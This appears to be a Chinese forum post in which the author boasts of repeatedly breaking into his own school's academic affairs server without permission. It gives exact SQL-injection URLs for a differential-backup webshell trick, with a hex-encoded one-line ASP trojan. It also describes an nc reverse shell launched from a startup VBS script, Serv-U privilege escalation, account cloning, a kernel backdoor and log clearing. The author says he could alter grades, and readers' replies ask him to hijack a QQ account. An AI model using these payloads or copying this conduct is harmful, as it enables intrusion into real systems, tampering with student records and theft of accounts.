X次杀入学校教务处

<>已经不记得是第几次进入学校教务处啦，反正每次都有不同的理由。好笑的是每次管理员只是发现入侵者，简单的做了下防护，而没有注意到其它安全的问题。所以就有了我X次入侵的过程。最重要的是觉得如果是黑客/安全技术爱好者的话，学校的网站是一定要拿下的，我已经拿下了学校的主网站和教务处网站，而这两个网站都是我们学校网站重中之重的网站，而且学校教务处网站有我们全校学生的成绩数据库，平时我们查成绩的时候就要用到这个网站。<BR><BR>  在我的印象中比较深刻的有三次进入到教务处网站。第一次是刚到学校读书的时候，老师老是叫我们到教务处找考试的消息。我就注意到教务处网站的重要性啦。当时还是sql注入和上传最流行的时候。当然我们学校网站也不例外啊。教务处网站用的是windows 2000 server系统。浏览下教务处网站觉得做的还不错的啊，扫了下开放的端口和检查下sql注入，竟然没有找到任何的漏洞（当时还是静态网站）。我不相信没有漏洞，也怀疑是不是学校有高人存在的原因。拿出啊D的注入工具找上传的网页，当出现有<a href="http://xxx.xxx.xxx.xxx/bbs/upfile1.asp" target="_blank" >http://xxx.xxx.xxx.xxx/bbs/upfile1.asp</A>的时候，我心里一阵狂喜。打开后才知道dvbbs6.0论坛上传网页。原来管理员把上传页面改了。呵呵，对不起啦，找到压箱宝底桂林老兵的上传利用程序上传asp木马，拿到了webshell。扫了下21端口，网站用的还是serv-u4.0版本，最后上传su.exe溢出拿到了网站的绝对权限。网站还开了3389也省了我开终端端口，克隆了guest帐号，读出管理员的密码，清理脚印走人。当时也是得意的很啊。我想管理员不会轻易发现我的存在了吧。过了很长一段时间，用克隆的帐号进入主机的时候，发现我再也进不去啦。管理员的密码也进不去，当时也很生气学校要我们交这个方面的钱，那个方面的钱。不得不让我再次下定决心入侵教务处，也就有了我的第二次。这次学校网站也改为动态的网站啦，用的是asp的程序。我想管理员发现了入侵者不一定在web程序上下功夫。打开留下的asp木马果然还在。当我再次拿出su.exe程序溢出时发现怎么也登陆不上主机。扫了下端口。晕的是管理员竟然把serv-u卸载啦。su溢出取得权限已经行不通啦。在主机上找有没有什么可以利用的漏洞。可恶的是管理员没有留下可以直接取得权限的东西。留下的asp木马可以浏览任意盘，看来也只有走这条路啦。思路是写个死循环，放个vbs到启动项目去。当主机启动时也就启动了我留下的后门。我的vbs放在c:\Documents and Settings\Administrator\「开始」菜单\程序\启动\shell.vbs下。利用瑞士军刀nc反向连接返回一个cmdshell,运行死循环的批处理。此时的cmdshell是guest权限，而guest权限下的确是有能力让主机重起的。（guest权限下重起代码已经打包给大家了）这个时候就只有等待咯。当黑客也是要有耐心的。呵呵，果然过了几天的时间网站打不开了，我想管理员应该去重新启动下主机了吧，后来也理所当然的再次拿到了主机的绝对权限。也再次克隆了guest帐号和管理员的密码。<BR><BR>  快要毕业了，学生一切的行动都要按照教务处的去做。呵呵我有网站的绝对权限我怕什么（后来学校把成绩这一块也放到了教务处）。我想怎么改成绩就怎么改。某一天，当我再次得意的用guest帐号和管理员密码进入主机的时候，它对我说"NO"。哦，当时我快疯掉啦，快要毕业了这么紧要的关头我再次与教务处网站说"BYEBYE"。我在想不知道是那个名人说过"如果连自己学校的网站都搞不定，他不适合当黑客"。这句话对我的印象很深刻。也就有了我最进的第三次比较深刻的入侵，也就是本文要讲的核心内容。（前二次是"过去式"，没有给大家抓图，对不起各位看官啦：））后来教务处有了很大的变化，我的asp木马终于被管理员发现了。webshell也就没有啦。dvbbs论坛也被删掉了。看来走上传拿到webshell行不通。网站不是用的asp的程序吗，看有没有sql注入漏洞。经过检查典型的sql注入漏洞。拿出大名鼎鼎的nbsi扫下，原来是DB_OWNER的权限</P>
<>哦，现在教务处用的是asp+mssql黄金组合。利用sqlhello.exe远程溢出程序，怎么也返回不了主机的cmdshell，看来溢出这条路也行不通啦。好的，整理下思路，首先是利用备份差异拿到webshell。当然要知道网站的数据库是不是放在同一个网站上呐，用nbsi的列目录功能，幸运的是数据库和web是同一个主机上的。（图</P>
<>好的，紧张的时刻到了，差异备份得到webshell。第一步：<a href="http://xxx.xxx.xxx.xxx/News_template.asp?id=395;declare" target="_blank" >http://xxx.xxx.xxx.xxx/News_template.asp?id=395;declare</A> @a sysname,@s varchar(4000) select @a=db_name(),@s=0x6A776368627565 backup database @a to disk=@s--备份当前数据库,以差异备份.（其中0x6A776368627565是我的当前数据库jwchbue）第二步：<a href="http://xxx.xxx.xxx.xxx/News_template.asp?id=395;Drop" target="_blank" >http://xxx.xxx.xxx.xxx/News_template.asp?id=395;Drop</A> table [huanle];create table [dbo].[huanle] ([cmd] [image])-- 建表加字段。第三步：<a href="http://xxx.xxx.xxx.xxx/News_template.asp?id=395;insert" target="_blank" >http://xxx.xxx.xxx.xxx/News_template.asp?id=395;insert</A> into huanle(cmd) values(0x3C2565786563757465207265717565737428224E6565616F2229253E)-- 写入蓝屏大叔一句话木马。第四步<a href="http://xxx.xxx.xxx.xxx/News_template.asp?id=395;declare" target="_blank" >http://xxx.xxx.xxx.xxx/News_template.asp?id=395;declare</A> @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C6A77635C7368656C6C2E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--。（0x643A5C6A77635C7368656C6C2E617370是备份得到webshell路径d:\jwc\shell.asp）。再次以差异备份得到插入有蓝屏大叔一句话木马的WEBSHELL 。备份得到webshell路径是<a href="http://xxx.xxx.xxx.xxx/shell.asp" target="_blank" >http://xxx.xxx.xxx.xxx/shell.asp</A>。第五步：<a href="http://xxx.xxx.xxx.xxx/News_template.asp?id=395;Drop" target="_blank" >http://xxx.xxx.xxx.xxx/News_template.asp?id=395;Drop</A> table [huanle]-- 删除建立的表。小心使得万年船：）。打开备份得到的网页。<a href="http://xxx.xxx.xxx.xxx/shell.asp" target="_blank" >http://xxx.xxx.xxx.xxx/shell.asp.</A>出现了错误。（图</P>
<>这次不会让“肉鸡”跑了。不仅克隆了guest帐号和再次读出了管理员的密码还放了内核级的后门程序，最后当然是清理脚印。我想管理员没有想到这么快会有入侵者再次“光临”吧。<BR><BR>    sql注入、上传型漏洞、serv-u提升权限已经流行了很长一段时间啦，说明教务处网站管理员不是很注意网络的安全。从小小的一个sql注入漏洞竟然可以拿到系统的administrator权限是多么恐怖的一件事情。可以看出安全是一个整体。毕竟是自己学校的网站也不好意思去破坏。（本人可是个好人哦）还是帮学校做下安全吧。系统已经打上了sp4和最新的补丁，管理员只是注重系统的安全，也可以说管理员很懒惰。问题的原因还是web程序上出现了漏洞，补上sql防注入的程序，serv-u下个最新的版本，并严格控制权限。mssql也打上了最新的补丁，并且严格控制任意盘的权限，重中之重是控制好c:\program file\serv-u、启动项目、等一些重要的目录的权限。web程序也给出专门的管理人员权限，我想基本上算是安全了吧。本文没有什么技术含量，用到的都是一些常用的入侵方法。比如guest权限下重起主机，这也是提升权限的一个方法。只是想告诉大家入侵并不是一成不变的，如果在入侵中多动下脑收获会更多。文章写作匆忙，难免会有纰漏，还望指正。<BR></P>
<> </P>

版权声明

1、转载或引用本网站内容须注明原网址，并标明本网站网址(www.gerfans.cn)。

2、转载或引用本网站中的署名文章，请按规定向原作者支付稿酬。

3、对于不当转载或引用本网站内容而引起的民事纷争、行政处理或其他损失，本网站不承担责任。

4、对不遵守本声明或其他违法、恶意使用本网站内容者，本网站保留追究其法律责任的权利。

本文地址: https://bbs.gerfans.cn/thread-69345-1-1.html

楼主，帮我把QQ拿回来吧

把你的成绩改了 支持

五体投地~~

<DIV class=quote><B>以下是引用<I>德国队18号</I>在2006-8-13 3:59:00的发言：</B><BR>
<>我来拜大哥了</P></DIV>
<p><img src=\"images/post/smile/dvbbs/em05.gif\" />